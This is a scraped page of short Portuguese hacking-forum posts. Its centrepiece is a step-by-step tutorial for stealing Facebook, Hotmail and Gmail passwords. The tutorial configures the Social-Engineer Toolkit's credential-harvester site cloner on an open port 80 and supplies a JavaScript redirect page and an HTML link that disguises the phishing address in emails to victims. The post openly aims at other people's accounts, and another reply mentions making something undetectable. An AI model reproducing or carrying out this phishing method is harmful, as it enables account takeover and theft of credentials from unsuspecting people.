ɓʀuɳѳ' ИИ#92

- Aqui tens http://www.4shared.com/rar/l0U-649D/Pack.html?

- O link tá on , mas eu vou fazer o upload meto aqui outra vez

Boa noite comunidade, Certamente, todos vocês já desejaram obter a password do hotmail, gmail ou do facebook pelos mais variados motivos. Hoje vou mostrar o método mais fácil de o conseguir rapidamente. 1 - Como já devem ter ouvido falar, existe uma distribuição linux com muitas ferramentas "hackers" (eu prefiro chamar ferramentas de segurança informática), o Backtrack. Para começar é necessário o download do Backtrack, aqui: www.backtrack-linux.org/downloads/. Faz o download da última versão da distribuição, Backtrack 5 R1 com Flavor KDE e Arch 32 Bits (ou 64 se o teu mac suportar, claro). Grava a imagem ISO num DVD. 2 - Depois de arrancar a partir do DVD do Backtrack gravado, basta iniciar o modo de visualização gráfica, escrevendo: startx Nota: Se preferires instalar o Backtrack tens de entrar com as credenciais: user:rootpassword:toor3 - Para já vamos configurar a ferramenta que iremos utilizar, o SET (Social-Engineer Toolkit). Para abrir o SET basta ir ao Application Launcher Menu > BackTrack > Explotation Tools > Social Engineering Tools > Social-Engineering Toolkit > set 4 - No SET vamos seleccionar a opção 11, para actualizar, escrevendo 11 e pressionando a tecla Enter. 5 - Depois de actualizado, fechamos a janela e voltamos a abrir o SET. Escrevemos y pressionando de seguida a tecla Enter quando for feita a pergunta "Do you agree to the terms of service [y/n]:". Agora estamos a utilizar uma versão mais estável e com mais opções. Vamos fechar o SET por agora selecionando a opção 99, porque falta configurar um pequeno parâmetro, que tem a ver com as ligações que a vítima vai fazer ao teu IP externo. Para configurar basta escrever no terminal Konsole (que depois de se fazer Exit já se encontra na localização pretendida): nano config/set_config No ficheiro de configuração basta andar para baixo e mudar a opção AUTO DETECT=ON para: AUTO DETECT=OFFApós ter sido editado este parâmetro vamos gravar o ficheiro usando as teclas CTRL+O e de seguida a tecla Enter para confirmar a operação. 6 - Podem consultar este excelente tutorial (http://hackersportug...-6-rat-t31.html), feito pelo kotwq, para abrir uma porta no vosso router que vai ser utilizada para os ataques, neste caso a porta 80, que é utilizada por defeito, devido ao facto de ser a porta dos serviços de HTTP. Entao, vamos abrir a porta 80 e aplicá-la ao computador que estamos a utilizar, pois só assim é que podemos receber conexões externas. (Para isto nao é necessário criar um DNS no no-ip porque o facebook e alguns sites bloqueiam alguns domínios, o no-ip.org é um deles). 7 - Depois de a porta 80 estar aberta já podemos utilizar o SET para conexões exteriores, por isso vamos voltar a abrir a ferramenta. Uma vez no SET vamos seleccionar as seguintes opções por esta ordem: 1 > 2 > 3 > 2Ou seja: Social-Engineering Attacks > Website Attack Vectors > Credential Harvester Attack Method > Site Cloner Quando é pedido teu o IP externo basta ir a sites como por exemplo o whatsmyip para saber que IP escrever. Depois basta escrever o site que queres clonar, facebook, hotmail, gmail, etc. Exemplo: "http://facebook.com". Quando alguém entrar no teu IP pela porta 80 (http://O TEU IP EXTERNO) e iniciar sessão vais receber automaticamente as credenciais, tal como podes observar nas imagens seguintes: O computador da vítima (neste caso o clone é o facebook): O teu computador: Agora basta enviar um email com o link, ou tentar que a pessoa abra o link de alguma maneira e inicie sessão. Basta utilizar a imaginação, se for bem pensado dá certo. 8 - Só falta camuflar o nosso link! Como já referi, o DNS nao funciona, porque a alguns sites nao permitem que se inicie sessao em alguns domínios, nem o uso de frames, mas há muitos em que isso funciona, como por exemplo o SAPO mail. A única hipótese (para o facebook) é utilzar o reencaminhamento. Eu utilizo o serviço de homepages do SAPO para fazer o upload de ficheiros com link directo, mas podem facilmente encontrar outros serviços, como por exemplo o diino.com , etc. Depois de escolherem o serviço de armazenamento de ficheiros, basta criar uma página html e editando-a, escrever o seguinte no ficheiro: <html><head><title>TITULO</title><script type="text/javascript"><!--window.location = "http://O TEU IP EXTERNO"//--></script></head><body></body></html>Depois, se optarem por enviar um email para a vítima ir aceder à pagina falsa do facebook apenas é necessário editar a mensagem no modo HTML e podem camuflar o link facilmente. Código: <a href="O LINK DA PAGINA HTML QUE CRIASTE">http://UM LINK CONVINCENTE</a>Créditos : CHP Créditos : Eu Espero que isso lhes seja útil Cumprimentos

- Xampp '-'

- Tradução -- http://www.4shared.com/office/O8nwoqgt/Traduao.html?

- Data de nascimento - Onde moras - Onde nasceste - Hobbies - Clube de futebol - Nome do Pai e da mãe e Irmão se tiveres - (Brincadeira) Bem-vindo espero que te divirtas

- Download -- http://www.4shared.com/office/O8nwoqgt/Traduao.html? - Cumpz

-Eu não pago 30 euros '-' Boa sorte com o projeto.

- Aqui ninguém é retardado este topico foi criado para dizer quem é o idolo independentemente de gostares ou nao dele sao escolhas. - Manel sempre a surpreender :o

- É naquela cena que tem os valores e depois tem um " botão" para carregar com um nome tipo esse

- Se não der manda mensagem

- Vais a opção " optionen " depois clicas em "item-schutz" e dps em cima em " auschlene " (penso que é assim que se escreve se nao for e parecido ) - Cumprimentos

- Compra tens e que fazer uma cena (:

-Omd Omd que susto quando vi meu perfil ia morrendo :( -Muito bom :) + 1

-Wiz kalifa because he smoke weed and because he sings magnificently http-~~-//www.youtube.com/watch?v=zE6Amttb9GY -Cumpz -Edit: And he have swagg

- Parabéns

Add skype (tem no perfil) Se quiseres que te meta isso Cumpz

Para ligar não, tens que o fazer para o deixar indetetável

Bem-vindo André espero(amos) que gostes da comunidade e que aprendas Bom ano , cumprimentos

O que eu tenho é o estrattore e até agora não tenho queixa. Cumpz

Oficial .

Tem.

Cya Tudo de bom, e obrigado pelo teu contributo à comunidade Cumprimentos

Claro que é lixo, assim não tudo com o set igual kkkkkkkkkkkkkkk Fui

Mais um server sem 6/7 skokpoadskpokodkpodas